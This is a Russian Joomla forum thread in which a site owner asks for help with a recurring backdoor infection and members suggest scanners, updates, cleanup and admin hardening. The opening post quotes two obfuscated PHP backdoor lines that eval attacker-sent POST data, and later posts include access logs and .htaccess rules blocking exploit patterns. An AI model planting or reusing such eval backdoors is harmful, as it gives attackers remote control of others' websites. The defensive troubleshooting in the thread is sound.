Форум русской поддержки Joomla!® CMS
06.12.2016, 21:55:10 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Вирус в корне сайта

 (Прочитано 1371 раз)
0 Пользователей и 1 Гость смотрят эту тему.
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« : 23.09.2015, 11:11:28 »

Кто то заливает вирус в корень сайта на Joomla 3.2, такого вида Robots.php - касперский его определяет как backdoor.php.
Этот вирус заливает в папки Joomla различные левые Php файлы с кодом примерно такими:
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qb8d09c'])){eval(${$s20}['qb8d09c']);}?><?php

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na0b0b6'])) {eval($s21(${$s20}['na0b0b6']));}?><?php

Также похожие строчки появились в некоторых своих php файлах Joomla.

Понятия не имею где искать дыру)

в апаче логе нашел такие строчки:

50.62.177.106 - - [20/Sep/2015:13:36:14 +0300] "POST /robots.php HTTP/1.0" 403 1518 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
45.59.31.193 - - [21/Sep/2015:12:08:29 +0300] "POST /robots.php HTTP/1.1" 200 28622 "-" "-"

Хостер отключил опасные функции PHP и включил онлайн антивирус на опасные запросы. Инфицированный сайт ничем не отличается по работе от обычного состояния. Чистил сайт но потом опять заражение повторилось.

Где копать?) плагины вроде все по удалял ненужные.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2653


step by step


« Ответ #1 : 23.09.2015, 11:24:00 »

А обновить Joomla до 3.4.х ?
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #2 : 23.09.2015, 11:28:30 »

Попробуйте http://yandex.ru/promo/manul
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #3 : 23.09.2015, 11:31:10 »

А вот тема с аналогичным вирусом и решением http://searchengines.guru/showthread.php?t=879811
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #4 : 23.09.2015, 11:44:25 »

Проверил манулом, зараженных вообще не нашел, только подозрительных файлов насчитал очень много))
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #5 : 23.09.2015, 11:49:16 »

Самое актуальное сканировать айболитом, а дальше комплексные меры по устранению и предотвращению, зная хостеров, по опыту работы... они мало что понимают какие именно отключать функции надо и для чего вообще это делается.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #6 : 23.09.2015, 11:52:21 »

Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #7 : 23.09.2015, 11:54:13 »

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #8 : 23.09.2015, 11:54:41 »

Вообще я делала так, качала все файлы сайта .т.е. всю папку www на комп, по коду находила в каких файлах сидит, чистила ручками, удаляла все появившиеся папки и файлы вирусы и нормально, сайт здоров.

А как решали вопрос с корнем проблемы?

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #9 : 23.09.2015, 12:04:25 »

Ну значит что то пропустили. После удаления всего, повторного заражения не может быть.

Для начала рекомендую посмотреть тут информацию и полистать список уязвимых приложений https://docs.joomla.org/Category:Security_Checklist/ru

Воспользоваться инструментом https://support.google.com/webmasters/answer/6066468?vid=1-635785918471659665-4262239763&rd=2
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #10 : 23.09.2015, 12:11:30 »

А как решали вопрос с корнем проблемы?
В соседних темах достаточно рекомендаций, чтоб самостоятельно устранить проблему, если есть конечно опыт в программирование, если нет, то вам без специалиста не обойтись.

Проблемы у всех почти разные. В моём случае  заражено было 749 файлов.
Везде в ручную удаляла вредоносный код, удаляла подозрительные файлы. У меня были заражены .js
не помню точно мои пошаговые действия, но сделала я всё правильно, Яндекс после перепроверки прислал положительный ответ, сайт здоров.
 
Для сканирования пробовала сервис: http://antivirus-alarm.ru/  -  выводится  путь до всех  вирусных файлов.

Кстати подозревала дырки в widjetkit

И опять же, поработал по ftp, удалил доступ, нужно опять поработать, создал/удалил
« Последнее редактирование: 23.09.2015, 12:15:25 от 12mv » Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #11 : 23.09.2015, 12:39:50 »

Удалять ftp при lfi rfi бесполезно )

local file inclusion
remote file inclusion

А еще много что интересного есть )

Айболит рулит конечно пока что только. Ну и компонент securitycheck очевидные уязвимости показывает.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #12 : 23.09.2015, 13:46:34 »

В любом случае, ftp просто так не должен висеть, пароли нужно постоянно менять либо создавать доступ при необходимости.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #13 : 23.09.2015, 14:14:55 »

удалял все зараженые файлы чистил потом опять гляжу в корне залит robots.php,  и опять файлы инфицировались
Удаляли вы, скорее всего, последствия работы программы, а не сам код, создающий этот файл. Для того, что бы его обнаружить, ваших знаний явно недостаточно. Проверьте айболитом в режиме ssh, он много чего находит. Сервис от Яндекса, на мой взгляд, сыроват. Далее - обновите движок и все компоненты. Часто взлом происходит именно через компонент - в самой Joomla дырок почти нет. Ну и напоследок - вспомните, ставили на сайт что нибудь с варезника? Последний вариант - если денег нет на специалиста, а у вас опять проблемы - удалите вообще все файлы с хостинга, поменяйте все пароли, залейте новую Joomla, скачанную с Joomla.org и переносите данные со старого сайта, предварительно проверяя их (тексты останутся в базе данных, перенести останется папки с картинками и шаблон). А вот шаблон (а обычно в нем и размещают бэкдор) стоит проверить особо тщательно.
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #14 : 23.09.2015, 14:58:55 »

В очередной раз почистил по удалял лишние плагины и компоненты, попробую проверить айболитом, если будет опять заражение то поставлю новую Joomla и новый шаблон и подключу базу старую если получиться))
 ФТП у меня отключен в настройках джумлы и на хосте не создан аккаунт
 http://antivirus-alarm.ru/   этот сервис не находит ничего)
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #15 : 23.09.2015, 15:08:10 »

https://revisium.com/ai/
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #16 : 23.09.2015, 15:53:55 »

Проверил айболитом, нашел много ложного по сути, и шифрованные данные base64 ----->

например (!$status){if($customURL=$this->input->get('returnurl','','string')){$customURL= base64_decode($customURL);}$url=!empty($customURL)? $customURL : 'index.php?op

или

…plate();}if($this->template){$input=JFactory::getApplication()->input;$fileName= base64_decode($input->get('file'));$client=JApplicationHelper::getClientInfo($t

На .htaccess чето ругается.

Кто разбирается в нем??)) есть какие то нарушения?


## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

## Mod_rewrite in use.

RewriteEngine On

## Begin - Rewrite rules to block out some common exploits.
# If you experience problems on your site block out the operations listed below
# This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

# RewriteBase /

## Begin - Joomla! core SEF Section.
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #17 : 23.09.2015, 15:57:08 »

Ну, наверное вот на эту строчку ругается:
Код:
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

так как там есть base64 ))
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #18 : 23.09.2015, 16:01:28 »


что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?
Записан
resident82
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 24


« Ответ #19 : 23.09.2015, 22:35:19 »

что значат эти строчки из апаче лога?

65.193.86.2 - - [23/Sep/2015:06:15:28 +0300] "POST /administrator/index.php HTTP/1.0" 303 282 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.0" 200 7281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
65.193.86.2 - - [23/Sep/2015:06:15:29 +0300] "GET /administrator/index.php HTTP/1.1" 200 7064 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"

IP подозрительные из США. думаеться это от тудова идет залив вируса в корень сайта

по поводу .htacsses надо что то там править или все норм?

htaccess вроде обычный стандартный.. в логах видно что свободно заходят в админку. я бы заблочил этот айпишник через htaccess + сменить логин/пароль на админку + запаролить папку админки с помощью htaccess. пароли естественно нормальные должны быть. ну и зачистить всякие левые и измененные файлы само собой.
« Последнее редактирование: 23.09.2015, 22:55:58 от resident82 » Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #20 : 24.09.2015, 08:24:23 »

Такс, поставил пароль на папку администратор на хостинге, теперь при входе в админку нужно ввести пароль дополнительный.
Сменил логин и пароль от админки
Добавил такие строчки в htaccess:

<Limit GET POST>
order allow,deny
deny from 65.193.86.2
deny from 72.81.248.66
allow from all
</Limit>
это должно заблокировать эти IP?

Что еще можно предпринять?)
« Последнее редактирование: 24.09.2015, 09:42:45 от sabnok » Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #21 : 24.09.2015, 10:35:03 »

это должно заблокировать эти IP?
Что еще можно предпринять?)
Не вижу смысла блокировать IP, так как маршрутизацию легко подделать. Например, подключившись через прокси или банально через ТОР. Заблокируете один адрес - зайдут с другого. И что, все прокси-сервера переписывать? Тогда уж раздобудьте списки серверов и заранее забейте. Всего то несколько миллионов строк в .htaccess... ))

Что еще сделать... Можете добавить плагин скрытия админки, наподобие JSecure Lite. Так вы усложните брут пароля и отбросите множество программ, которые сканируют именно админку. А так же прописать в htaccess запрет на определенные урлы, запрет на папки и т.д. Где то тут выкладывали FAQ по настройке. Ну и еще раз пройтись по всем компонентам-модулям, убедиться, что все скачано с официальных достоверных источников и имеет последнюю версию.
« Последнее редактирование: 24.09.2015, 10:38:56 от SeBun » Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #22 : 24.09.2015, 12:43:54 »

А адрес админки нельзя сменить? Я вот на IPB движке так делаю, постоянно ломятся туда. На Joomla не пробовала.

Было бы ещё полезно, сделать вход в админку с одноразовым кодом, который приходит по SMS.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #23 : 24.09.2015, 12:46:10 »

Базовую авторизацию на админку ставьте.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2653


step by step


« Ответ #24 : 24.09.2015, 12:49:08 »

Поставить плагин Marco's SQL Injection - отсылает письма с логом атаки.
http://joomlaforum.ru/index.php/topic,195980.0.html
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #25 : 24.09.2015, 13:08:41 »

А адрес админки нельзя сменить?
Есть два способа - авторизация через htpassword или (и) плагин скрытия, например, JSequre (Lite версия бесплатна). В первом случае будет запрашивать дополнительный пароль, во втором - выкидывать на главную или на специальную страницу. Можно и сменить адрес, но для этого придется лезть в ядро.
« Последнее редактирование: 24.09.2015, 13:11:56 от SeBun » Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #26 : 24.09.2015, 16:26:52 »

А я просто поставил пароль на папку administrator с помощью средств хостинга, и теперь при попытке входа в админку Joomla, вылазите дополнительная форма автоизации) такой метод надежен?) или хакер может сбросить его?

нашел такое в инете:

## Начало - Запрет на выполнение php-скриптов в корне сайта
<Filesmatch ".(php)$">
order deny,allow
deny from all
</Filesmatch>
<Filesmatch "^index.php">
order allow,deny
allow from all
</Filesmatch>
<Filesmatch "^index2.php">
order deny,allow
allow from all
</Filesmatch>
## Конец - Запрет на выполнение php-скриптов в корне сайта

посколько заливают в корнеь сайта php файл, то это сможет его заблокировать?
« Последнее редактирование: 24.09.2015, 16:54:42 от sabnok » Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2281



« Ответ #27 : 25.09.2015, 00:07:44 »

если я получу доступ к корню, мне плевать на эти разрешения. Если я обнаружу, что залитый мной php не выполняется, я могу залить перловый скрипт или скачать index.php (либо взять из дистрибутива), дописать в него что нужно и залить обратно. Не занимайтесь ерундой.
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #28 : 27.09.2015, 09:46:13 »

Инфицирование вроде прекратилось, но происходят такие запросы в логе

94.23.77.182 - - [27/Sep/2015:03:41:49 +0300] "POST /media/dhl/info.php HTTP/1.1" 404 1740 "-" "Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.10"

что он означает? Попытку залить файл, но не удачно??
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #29 : 27.09.2015, 09:53:20 »

значит не прекратилось.таких в медиа запросов не может быть
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet